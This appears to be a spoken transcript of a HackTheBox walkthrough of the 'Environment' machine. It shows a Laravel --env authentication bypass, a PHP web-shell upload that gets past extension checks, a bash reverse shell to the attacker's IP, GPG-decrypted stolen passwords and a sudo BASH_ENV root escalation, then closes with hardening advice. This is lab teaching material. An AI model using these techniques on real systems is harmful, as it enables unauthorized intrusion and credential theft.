What's going on YouTube? This is IPSEC and we're doing environment from HackTheBox, which starts off with exploiting two vulnerabilities within Laravel itself. Vulnerabilities in the underlying framework running websites are very dangerous because these packages are tied to custom code, so they aren't updated automatically. Additionally, companies are often hesitant to make these updates as it requires a lot more effort than just normal packages. Anyways, we discovered debug mode is turned on, which lets us leak verbose information when we cause errors. If we cause an error on the login, we discover if we switch the app to pre-production mode, we can perform an authentication bypass. It also will show the Laravel version. So we can search CVEs, find an argument pollution vulnerability, which lets us switch the application to that pre-production mode and perform the argument bypass. From here, there's a second vulnerability, which lets us bypass upload restrictions and upload a PHP file to get a shell. After this, we decrypt a PGP protected file and then exploit a Sudo configuration to get root. So with that being said, let's just jump in. As always, we're going to start off with an nmap, so -c for default scripts, -v enumerate versions, -vv for double verbose. This gives us things like the TTL, OA output all formats, put in the nmap directory and call it environment, and then the IP address of 10.10.11.67. This can take some time to run, so I've already ran it. Looking at the results, we see just two ports open, the first one being SSH on port 22, and the banner tells us it's a Debian box. We also have HTTP on port 80. Its banner tells us it's nginx, and it's directing us over to environment.htb. So let's go ahead and add this to our host file. So we'll do sudo v etc host. Then we can add 10.10.11.67 environment.htb, save that, and let's go take a look at the page. So I'm going to do http environment.htb. And it looks like my burp suite is on intercept, so I'm just going to forward that. And we get the page. At the footer, we see environment copyright 2025 and production v1.1. I always like trying to identify what is running, so I'm going to look at the page source to see if anything's in the header that tells me like WordPress, Drupal, Joomla, things like that. I don't see anything. There is Wapalizer. We can look at it. We have Tailwind, nginx, JavaScript. Doesn't really show us that much. We can run tools like Nuclei. So I started doing this a lot more just because it does give pretty good information. So I'm going to do environment.htb, let this run. And then let's see, what else could we do? We could look at 404 pages. So if I do like ASD, we get this 404 not found. And this looks very much like a Laravel error message. I'm going to go to like OXDF error message, and he has a cheat sheet. Because this could also be, I want to say there's a JavaScript framework that kind of does a 404 pipe not found or something like that, but it's slightly different, I want to say. Is it here? I don't see anything. PHP FPM. Looking at these screenshots, it is definitely going to look like Laravel. That's the only one with like a blue background. If we click it, we can see something like this, maybe normalize 801. Let's see this. Yes, it does match. So this is definitely going to be Laravel. There's other ways you could flag that as well. I'm sure if we look at like the cookies, so let's go over to the storage. We can see there is a Laravel _ session, which is the default name, and this XSRF token. I want to say if it was like Django, the default CSRF, just small nuances that can easily kind of tell what's going on. So we know this is a Laravel page. We have a join our mailing list. So I'm just going to see if this functionality works. We do root at ipsec.rocks, email added. And I'm going to be curious if it uses like the API or anything. So let's send this, join, send it over. Where are we making this request to? Just /mailing. Looking at these headers, I don't think this is going to any type of built-in Laravel API. We have a token here. If we didn't send this token, we just get the page expired. That is expected. If we hit this page with no email, it just directs us back. So nothing too interesting, right? I'm going to run a GoBuster. So we can do GoBuster directory mode -u http environment.htb word list. I need to spell that correctly. Was it opt seclist discovery web content raf small words.txt. Run that. And we're getting a lot of just 403s. So I want to add this to my block list. So I'm going to do -B. I'm going to say 403, 404. So this means it's going to hide any status code of 403 and 404 from us, which just makes it a little bit easier. We see upload goes to a 405, and this size is pretty big, right? So let's go take a look at what a 405 page looks like. I'm just going to go /upload, and I probably should turn my burp suite off. We get a method not allowed, and this is in debug mode because we can see a lot of information. We see Laravel version 11.30.0, and we kind of see what the page looks like, our data here. So this does start giving us access to the source code, but I don't think we saw anything really that interesting, right? We could dig through all the frames, but first we see what version of Laravel is running. If we do Laravel release notes, maybe this will have like the dates and everything. We can see how old this is. Let's see, Laravel 11.x. This looks good. 11.13. We don't see anything here. Let's just go to CVE details. I'm sure if we did more research around change logs, release notes, we could find exactly when this version came out. But I really don't care that much about it. I just want to know like CVEs against Laravel. So looking at this, I'm going to click on vulnerabilities, and we can see quite a few, right? Let's see. Full stack framework in Livewire version 3. I don't know if this server is using Livewire. I'm assuming it's unauthenticated because it's 9.8. But I'm going to move on from that. I also think this box was published probably right around this time. So it's possible this CVE is interesting. Let's see. Laravel is a web framework. When using wildcard validation on a given file or image field, files.star, a user-crafted request could bypass validation rules. I don't see any like file upload, and I haven't seen any fields with file, so I'm going to ignore this one for now. Laravel Pulse, I don't know exactly what that is. Monitoring tool. Let's see. Laravel's web application framework. When the register argc argv directive is set on, any user can call a URL with a special crafted query string and change the environment used by Laravel handling the request. So this kind of sounds interesting. Let's see how to do this. I'm just going to go GitHub POC and see if anything comes up. We have this CVE. Let's see, does it tell us exactly how to use it? Waiting for the page to load. It's talking about it. POC example. So it changes to local. Okay. So we do question mark as a parameter, --env is equal to something. So let's go ahead and see if this works. So chances are the environment is production. I would guess it's kind of development because it's in debug mode. It's very odd to see a production web app with debug mode turned on to get that verbose error message. But let's try this. I'm going to do question mark --env, and we'll say dev. That's a common one, right? And we see it is reflected here. My first thought is it weird where we can actually execute system code? So we can do please subscribe like this. I really don't think this would work, but it's something we kind of test, right? It is going to be URL encoding all these. So it doesn't look like we have a way to do that. And we also can't really do cross-site scripting. That is good to know, right? I don't really see any other pages. Let's go back to our GoBuster. We have a /login, upload errors, mailing is a 405. We got up. So let's check up and log in. I'm really curious what up is. If we just go up, application's up. I don't know what I expected. We got a login endpoint. So we have username, password, so we can do something here and see if this goes to like an API and see what this login request looks like, right? It's just making a post to /login. So I don't think it's using the internal Laravel API. If we forward this request, let's see, invalid credentials. We could identify like potential SQL injection. So I'm going to cause an error message in this and see what happens, right? Because we can potentially see source code if we cause error messages. So normally in PHP, We notice this a lot in like reverse shell scripts when you just do like system request CMD. If you don't specify the CMD, it errors telling you we need CMD parameters. So I'm just going to get rid of, I guess, the email parameter. And we'll forward this along. And there we go. It's trying to get the email parameter and it can't. So that's why we error here. And looking at this, we do a post to login. Let's see. I don't see exactly where it's sending the email and password, so I can't tell if it's using like prepared queries, the Laravel syntax, how it's actually doing logins. This syntax is really odd, right? We have this if remember is equal to false, then keep logged in is false. Else it's true, keep logged into true. And then we set it to false here. I don't see this variable initialize as keep log in, right? So if I have remember and I set it to something that's not true or false, then it won't be initialized and we'll error here so we can see more of the code down below. So that's my logic and what I'm going to do next, right? So let's try this again. We'll do this, turn intercept on, forward it along, and let's say remember is equal to please subscribe. It just doesn't have to be true or false, right? We could probably just, if we didn't set it at all, it would probably error when it's trying to grab this variable, right? So we have to set it to something, just can't be true or false, I believe. Go here, and now we error on line 75, which is much lower, and we can see more of the code, right? So now we see this if app environment is preprod, then it's automatically going to just log in with the very first user ID. And here it's using the correct syntax to pull the user. I'm guessing the next line down will be like user.password is equal to something. So it's not vulnerable to SQL injection, but it is going to be vulnerable to authentication bypass. So we just have to set the environment to preprod. So let's go ahead and go back to the login. Do this once more with feeling. Click this, go in, and let's see, post to login. I'm going to specify --env is equal to preprod. And this should trigger that one piece of code that's just going to automatically put the user ID 1 into our session. So for this, send it, and we get logged in. So we have the dashboard, the profile, and log out. We could also change this so we can do --env is equal to preprod to see if there's any hidden features. And we do get a PHP info page. So I'm going to go click that. It looks like the link goes away, so that's a bit annoying. Let's see, this goes to management/info. So we can do info preprod like that. And there we go. We have a PHP info page. Now, this doesn't actually bias anything. But the first thing I do is just search for passwords because this is going to export like the environment, right? So I'm looking for like MySQL passwords, Redis passwords, things like that. Let's see, SQLite. Do we have where it's loading? I'm trying to find out, like, do we know this application is SQLite or not? But I didn't see any passwords in this PHP info page, so nothing too interesting. This is not clickable, so we can't really do anything here. If we go to profile, we can choose a new picture and upload it. So traditional PHP, whenever you can upload files, it's very, very dangerous because if you upload a PHP script, you can get code execution. So let's go ahead and try that. And I just realized I never talked about what nuclei I found, so I guess we can go over this real quick. Let's see. It found Laravel there, csurf token. Oddly enough, it checks SSH. Let's see. So I guess it's doing like a port scan. I thought it was just web, but it does a little bit more. I guess the most interesting to me is tech detect to Laravel, and it finds it there, but nothing too interesting here from nuclei. So now let's go ahead and copy this image here, just in case we need it. I'm also going to do vshell.php. And let's see, I want to do a system request CMD. And I know I have a typo there. I will fix that momentarily. There we go. Save that. So now let's go ahead and try an upload. So let's see, proxy intercept on. Let's upload, choose a new picture. Let's go to HTTP, environment. And then first, I'm just going to upload shell.php. Upload. Send it over to repeater. And let's see, if we just send this, we have invalid error detected. And I'm just going to auto scroll here to make it easier. And let's see, I'm going to change this to be image/GIF. Send it. Invalid file. Let's see, we can do shell.gif. Still invalid file. Let's change the magic bytes. I want to say it's like GIF89A. Like if that's the beginning of a file, I want to say it detects it as GIF. And it uploaded. So let's try shell.gif.php. And we get invalid file detected. So let's see, what can we do here? We don't have any like include options, so we can't do like a file inclusion. And if we just try to access this URL, already exist. Let's do shell1. Let's see, environment.htb goes in storage files, shell gif. If we just try to access this, let's see what happens. Get rid of those backslashes. It contains errors. Question mark, sleep is equal to 1. It comes back immediately. So we know it's not executing code because we don't have the PHP extension. And it looks like it is kind of filtering for that, right? We could try like PHP 5. PHP 5 looks like it uploaded. Let's see, does this actually execute with PHP 5? I doubt it because it's nginx. Apache is very like loose with how it executes. Normally in nginx, you have the like location header or whatever it is in the code. Specify only .php gets passed through. It is in repeater. If we send this, what happens? It just echoes everything back. So PHP 5 does not work. But what is interesting about this is it allowed it, right? It doesn't allow us doing PHP, but it allows PHP 5. So what that tells me is there's a like blacklist around what extensions we can upload, right? And if we think back, looking at the CVEs, if we went back to Laravel, right? There was one that said, what is it? Image validation. A user-crafted malicious request could bypass validation rules. So I'm going to turn intercept off. Let's click this. Does it tell us any more? Let's go to the advisory. We may have to just search the CVE for a POC. That gives us no details. The commit, is this going to tell us anything? If not, then we can just search for this CVE and it should come up pretty quickly, right? This does a lot more things than just one thing. So it's probably going to be quicker just to search GitHub POC. Go to Google. Advisory, Wiz.io. This normally has actual POCs. Let's see, impact. Let's see, the issue. Bypass validation rules. Does not say how to bypass, though. Let's see. Here's a actual POC. 271. This is a different CVE. 5.2, not 5.5. Let's see. Let's just try searching the CVE and see if I get a like write-up or something like that. This looks like a blog post. Migo security. Let's see. When using wildcard, that's what we saw. Let's see. Replace instance.placeholder with static placeholder hash cross-validator. So it looks like maybe some type of validator is removing characters at the end. So like a dot and a star gets removed. So I'm guessing like, let's try this real quick. If I do PHP star, page expired. So we have to go back and get a fresh cookie. We have to log in, I guess. Root at ipsec.rocks, password. I'm guessing it like trims the end of a URL, and that's how this vulnerability comes into play. So send this. We need to do --env is equal to preprod, forward along, profile, intercept on, choose picture, upload, and let's see. If I just replace this, what I have before, not that one, this one. There we go. Send it along, and it looks like it uploaded. I wonder if it wrote to just PHP. Let's copy. Where's the page? We actually can go here. It would be shell, file not found. Let's try adding a dot on the end. Send this. And there we go. The dot is not apparent here. We just wrote to shell1.gif.php. So it looks like it's trimming the end period. So if I now go back to this one, we don't have that PHP string, which means if we change this to a post request, we can say cmd is equal to ID, and there we go, code execution. So let's do a --c --i dev tcp 10.10.14.8 9001 0 and 1 like that. Let's make sure this is all URL encoded. Then nc lvnp 9001 send, and we get a shell. Awesome. So let's create the proper TTY, python 3-c, import pty spawn, bin bash, then stty raw minus echo, foreground, enter, enter. And let's see, we can also fix our rows. So rows 26, columns 121, stty rows 26, cols 121. And then export term is equal to xterm, and now we can clear the screen. Awesome. So the first thing I always like doing on web servers is dumping the database. So let's see if we can find where it's at. I'm in app storage. Let's see. Find.grep SQL. Do we just have a database? There is a databases directory. SQLite 3. Databases, awesome. .dump. And we have users, awesome. So that's the mailing list. Cooper, Bob, Xander, nothing too interesting there. Let's see. Sessions. There we go. And we have some passwords. So let's see, this is going to be the users table. We can do email and password. So select email password from users. And we have a list of things. And I don't think cracking this actually gets us anything, so I'm not going to do it, but I still wanted to show the process, right? Because if we were on this box, let's exit out of SQLite. I did Control D, and we went to /home. We'd discover hish is anyone can go into this directory, right? And we can get user.txt here, and we also see a backup directory. And the backup directory does have stuff. So we can see there is a key vault.gpg. So if we try to like gpg-d key vault like this, we can't create the directory var www.gnupg. If we look, there is a gnupg directory in hish. If I can type. And this has the key ring, right? And if there's a password here, we'll have to do like hashcat or John to crack it. But we can see if there is a password. So what I'm going to do is just cp-r, this directory, over to dev shm. And then I'm going to do a GPG. I think it's --home, dev shm gnu, like this. And then we will try to specify the key vault. Let's see. Error creating backup key vault. Let's see. Is it GPG-H grep home? It's probably -8 H. There we go. What are the options? I know there's a way to specify home. Maybe it was in the man page or something. Let's see. Maybe it's home dir. Okay, that is progress. So let's do home hish backup key vault. Let's see. Error creating this directory. Let's see. I'm going to do export. So right now, if I do echo home, it thinks my home is var dub dub dub. So I'm going to export home is equal to home hish and change that. So now it thinks my home directory is that. And now let's try running this. And the easiest thing to do is probably to back up this GNU-PG directory, copy these locally, and then just run it on your local box, right? But I want to try getting it this way. Let's see. Error creating. Oh, I don't have a -d. There we go. Let's do export home is equal to var dub dub dub. Do I even need to change my home directory? Was this just me forgetting the -d? It was. So if you just specify the home dir where the GNU-PG file is, you don't have to copy that back. Just don't forget the -d to decrypt, right? And we have PayPal, environment.hdb, and facebook.com. Now, this is probably going to be the password for the user hish, right? Because that's where we have the backup. So I'm just going to try SSH hish at environment.hdb, paste in that password, and we get logged in. Now, we already saw the home directory, right? That's not too important. If I do a sudo -l, put the password in, we can see the sudo. And this is interesting. Whenever I see environment keep, that is interesting to me, right? We're keeping env and bash environment. And we're able to execute user bin system info. So let's see what this file is. It is a bash script. If I just do a less, we can see it's just going to display a bunch of things. So we can just quickly execute this. If we did sudo this, that's what it does, right? But looking at it, it's not doing, hold on, sudo -l. Let's see. Okay, I was thinking we could set like the, what is it? Not the home directory. I am blanking on the name. The path. I was thinking we could just have the path set and it would keep it, but we can only keep two variables, env and bash env. So I'm going to Google what bash env is. So let's go here. I have to turn my proxy off. Let's see. Bash env, when bash executes a script, then expand to the name of the, so it's the bash startup file. So all I have to do is create a startup file. So we can do dev shm, pwn.sh is what I'll call it, bin bash. And let's say this is just going to execute bash. We probably want to make this executable. And now we can go back to where we executed this. And I can say sudo bash environment is equal to dev shm pwn.sh. So what this is going to do is it's going to execute this script as my like bash init. And what it does, it's just going to drop me into a shell. There we go. Awesome. And that is going to be the root. So we can do that, and we can get root.txt, and yeah, that is the box. So hope you enjoyed it. Take care. And actually, real quick, if we want to talk about hardening the box, since we did this pretty quickly, we can show this real quick. If we just hit /upload, right? That's where we get this error message. And this is very bad whenever it's in production. So I bet if we went to var dub, let's go app, maybe, is there .env? There is. Let's see. There we go. We got this app debug. So if we just change this to false, let's see, service PHP FPM restart. Does that work? Oh, shoot. How do I restart this? Find.grep PHP. Systemctl restart PHP 8.2-fpm. That looks promising. It's taking some time. I wonder if it can't restart because I have a shell open, and that's what it's hanging on, right? I'm just going to exit this real quick, and that may speed things up. As soon as I did that, you saw this finished, right? So just waiting to stop that process. So now when I do it, we just get the server returned a 405 method, right? It's not giving you that Laravel debug output, which is helpful for developers, very helpful for attackers. So you always want to have that, right? You could have a second way to do this, I want to say. Let's see, var dub app. Let's see, v. So if we didn't have this, so let's set this back to true. And then systemctl restart PHP 8.2 FPM. So there we go. We're back there. I think it's like nginx sites, enabled. We could probably muck around with this. So let's see. nginx PHP FPM intercept error. I want to say this is going to get me to the page. I've never really done this with PHP FPM, but I assume it is possible. FastGI intercept error is on. Okay. And this stanza, this is why we can't do PHP 5, right? This is just saying anything that ends in PHP, send it to PHP FPM, which executes the PHP script. Since it has the .php and then end of string, that's why PHP 5, 6, 7, whatnot don't work, right? So let's do systemctl restart nginx. Does that alone fix this? We probably have to like say where the error goes. Okay, that did not do it alone. Let's see. I don't think this is going to be right. But I'm curious. No. So how do we do this? Oh, wait. The error message wasn't 403. I want to say it was 405. If we go back, I think this is where I ran GoBuster. 403. Let's see. Upload. Damn it. Upload. There we go. Yeah, the status code is 405. So let's go ahead and do this. 405. Save it. Restart. Refresh. And there we go. So now nginx, whenever it sees that 405 status code, it's just going to give us a not allowed. So there's two different ways we could have blocked that verbose error message from reaching the user. The recommended way, definitely not run the application in debug mode, because some frameworks may do additional things, right? There is like a xdebug header in PHP that we saw, I think in like the Olympus machine years ago, that when it's set, you can just run PHP based upon the header. Laravel doesn't allow that, but you never know exactly what your framework's allowing by being in debug mode, right? So always best to not run the framework in debug mode, and then you can double check it by just having your nginx hide specific error messages. So with that being said, that's going to be the box. Hope you guys enjoyed it. Take care, and I will see you all next time.